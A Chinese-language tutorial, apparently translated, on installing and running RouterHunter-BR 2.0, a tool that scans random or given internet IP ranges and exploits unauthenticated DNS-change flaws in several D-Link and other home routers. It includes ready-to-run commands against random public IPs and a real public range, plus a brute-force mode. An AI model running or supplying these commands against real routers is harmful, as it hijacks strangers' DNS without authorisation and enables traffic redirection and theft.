0×00 前言
我們會介紹一款自動挖掘路由器漏洞的測試工具,它能夠自動化在網際網路大範圍搜尋包含漏洞的路由,進行測試、進一步確認這些漏洞問題,其中會涉及D-link 的多款路由器。該工具是採用python 2.X寫的,因此我們最好使用python2.7 來執行它,所以希望提前安裝好相關的環境。當然我是在kali-linux 下直接執行的,因為該款作業系統是預先安裝好了測試環境的。
0×01 下載
1 github 下載地址 https://github.com/jh00nbr/Routerhunter-2.0 我們可以點選” Download ZIP ” 進行下載
2 我們將該壓縮包 下載到 根目錄下, 即是/root/Routerhunter-2.0-master.zip, 然後我們解壓在 同一個目錄下,即是 /root/Routerhunter
3 我們進入該目錄root@kali:~/Routerhunter#
4 執行該程式root@kali:~/Routerhunter# python routerhunter.py -h
5 我們可以看到相關的使用介紹
0×02 介紹
RouterhunterBR 是一個 自動化安全工具,它能夠搜尋並且自動化測試網際網路上路由器的漏洞,Routerhunter 旨在通過網際網路去探索自定義的IP地址或者任意的IP地址以便自動地攻擊這些家庭路由器中的DNS篡改漏洞,這個指令碼能夠測試路由器上的四種漏洞
1 Shuttle Tech ADSL Modem-Router 915 WM 上的未授權遠端DNS篡改 #更多詳細資訊,請參考http://www.exploit-db.com/exploits/35917/
2 D-Link DSL-2740R上的未授權遠端DNS篡改 #更多詳細資訊,請參考http://www.exploit-db.com/exploits/35917/
3 D-Link DSL-2640B上的未授權遠端DNS篡改 #更多詳細資訊,請參考http://1337day.com/exploit/23302/
4 D-Link DSL-2780B DLink_1.01.14 的未授權遠端DNS篡改 #更多詳細資訊,請參考https://www.exploit-db.com/exploits/37237/
5 D-Link DSL-526B ADSL2+ AU_2.01的未授權遠端DNS篡改 #更多詳細資訊,請參考https://www.exploit-db.com/exploits/37241/
6 DSLink 260E的未授權遠端DNS篡改 #更多詳細資訊,請參考http://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html
0×03 安裝要求
1 在我們python當中,能夠匯入如下庫
sys, os, argparse, itertools, requests, random, time, threading, base64, socket,datetime
2 如果沒有這些庫,可以採用如下的任意方式安裝
1 2 3 |
pip install datetime apt-get install datetime easy_install datetime |
0×04 使用
1 使用說明
optional arguments: # 可選的引數
-h, –help show this help message and exit # 顯示這個幫助資訊,然後退出程式
-range 192.168.1.0-255, –range 192.168.1.0-255 Set range of IP #定義需要掃描的IP地址範圍。例如 –range 192.168.1.0-255, 可以掃描這個IP段
-bruteforce, –bruteforce Brute force with users and passwords on routers that requires authentication, forcing alteration of dns.
# 暴力破解需要認證的路由器,迫使這些路由器修改DNS
-startip 192.168.*.*, –startip 192.168.*.* Start – IP range customized with wildcard / 201.*.*.* # 使用掩碼的來定義開始IP地址範圍,例如 192.168.*.*
-endip 192.168.*.*, –endip 192.168.*.* End – IP range customized with wildcard / 201.*.*.* # 使用掩碼的來定義結束IP地址範圍,例如 192.168.*.*
-dns1 8.8.8.8, –dns1 8.8.8.8 Define malicious dns1 #定義第一個惡意的DNS,例如可以把這些路由器的DNS改成8.8.8.8
-dns2 8.8.4.4, –dns2 8.8.4.4 Define malicious dns2 #定義第二個惡意的DNS,例如可以把這些路由器的DNS改成8.8.8.8
–threads 10 Set threads numbers #設定請求執行緒數目
-rip, –randomip Randomizing ips routers #隨機定義網路上的路由器IP
-lmtip 10, –limitip 10 Define limite random ip # 定義一定數目的任意IP地址
2 使用案例
掃描任意IP:
1 2 |
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10 |
掃描一段IP範圍:
1 |
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10 |
使用掩碼的形式進行掃描:
1 |
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10 |
暴力破解需要認證的路由器
1 |
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10 |
3 使用結果截圖
0×05 總結
1 這個指令碼可以用於路由器的滲透測試。
2 在進行路由器安全評估的時候,我們也可以使用這個指令碼對其安全性進行檢查
3 這是國外一款滲透測試工具的中文譯文!請大家多多指教 ^^_^^